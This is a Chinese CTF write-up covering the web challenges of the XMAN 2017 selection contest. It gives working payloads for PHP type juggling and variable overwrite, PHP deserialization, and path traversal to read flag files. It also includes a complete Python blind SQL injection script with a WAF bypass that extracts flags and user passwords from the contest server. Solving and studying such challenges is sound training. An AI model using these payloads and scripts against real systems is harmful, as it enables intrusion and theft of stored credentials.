XMAN 2017 选拔赛 web部分wp

没报名xman2017夏令营,不过选拔赛去瞄了一眼web题,目测不难

variacover

<meta charset="utf-8">
<?php
error_reporting(0);
if (empty($_GET['b'])) {
    show_source(__FILE__);
    die();
}else{
    include('flag.php');
$a = "www.XMAN.com";
$b = $_GET['b'];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo $flag;
}else{
exit('你的答案不对0.0');
}
}
?>

php弱类型,变量覆盖

urldecode

URL双编码

unserialize

class FileClass{
    public $filename = 'error.log';

    public function __toString(){
        return file_get_contents($this->filename);
    }
}

php反序列化

$a = new FileClass();
$a->filename = 'flag.php';
echo serialize($a);

O:9:”FileClass”:1:{s:8:”filename”;s:8:”flag.php”;}

Welcome2IRC

这个真的是web题吗。。。随便找个irc客户端。。。

PHP

http://challenges.xctf.org.cn:8004/index.php~

<?php
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
        $aaa = $_GET['aaa'];
        $aaa=="1"?die("Emmm..."):NULL;
        switch ($aaa)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
    is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
    if(@$bbb["ccc"]){
        ($bbb["ccc"]>2017)?$b=1:NULL;
    }
    if(is_array(@$bbb["ddd"])){
        if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
        $eee = array_search("XMAN", $bbb["ddd"]);
        $eee===false?die("Emmm..."):NULL;
        foreach($bbb["ddd"] as $key=>$val){
            $val==="XMAN"?die("Emmm..."):NULL;
        }
        $c=1;
}
}
if($a && $b && $c){
    include "flag.php";
    echo $flag;
}
?>

几个点:aaa:switch没加break,当然弱类型也可以,ccc:加空格绕过is_numeric,ddd:array_search弱类型比较
aaa=&bbb={“ccc”:”2018 “,”ddd”:[[],0]}

download

http://challenges.xctf.org.cn:7775/README.md
http://blog.csdn.net/hitwangpeng/article/details/45602187

http://challenges.xctf.org.cn:7775/components/filemanager/download.php?path=../../../../../../../var/www/flag.txt&type=undefined

CTF用户登录

sql盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# -*- coding:utf-8 -*-  
import requests
import string
#tab=string.printable

site = 'http://challenges.xctf.org.cn:8003/'
url = site + 'login.php'

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
"Content-Type": "application/x-www-form-urlencoded"}
proxies = { "http": "http://127.0.0.1:8080", }

s = requests.session()

def login(username):
user = username
data = {
'username':user,
'password':'',
'submit':'submit'
}
r = s.post(url,data=data,headers=headers)
#print r.text
return r.content

def wafbypass(sql):
table = [' ']
for word in table:
sql = sql.replace(word,'\t')
return sql

def exp(index):

for word in string.printable:
#sql = "select database() limit 1"
#username = "admin'and (mid((select database() limit 1) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select schema_name from information_schema.schemata limit 1 offset 1) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select table_name from information_schema.tables where table_schema='comeon23333' limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select column_name from information_schema.columns where table_schema='xman' and table_name='ctf_users' limit 1 offset 3) from %d for 1)='%s')#" % (index,word)
username = "admin'and (mid((select ggflag from ctf_flags limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
username = wafbypass(username)
#print username
#print login(username).decode("utf8", "ignore")
#print "成功".decode("utf8", "ignore")
if "成功".decode("utf8", "ignore") in login(username).decode("utf8", "strict"):
#flag = flag + word
return word
return "?"

def exp_use_ascii(index):

for word in string.printable:
#sql = "select database() limit 1"
#username = "admin'and (mid((select database() limit 1) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select schema_name from information_schema.schemata limit 1 offset 1) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select table_name from information_schema.tables where table_schema='comeon23333' limit 1 offset 0) from %d for 1)='%s')#" % (index,word)
#username = "admin'and (mid((select column_name from information_schema.columns where table_schema='xman' and table_name='ctf_users' limit 1 offset 3) from %d for 1)='%s')#" % (index,word)
username = "admin'and (ascii(mid((select gpass from ctf_users limit 1 offset 1) from %d for 1))=%d)#" % (index,ord(word))
username = wafbypass(username)
#print ord(word)
#print username
#print login(username).decode("utf8", "ignore")
#print "成功".decode("utf8", "ignore")
if "成功".decode("utf8", "ignore") in login(username).decode("utf8", "strict"):
#flag = flag + word
return word
return "?"

print 'begin'
flag = ''
for i in range(1,100):
flag = flag + exp_use_ascii(i)
print flag

upload

.htaccess上传绕过
不过好像有很多搅屎的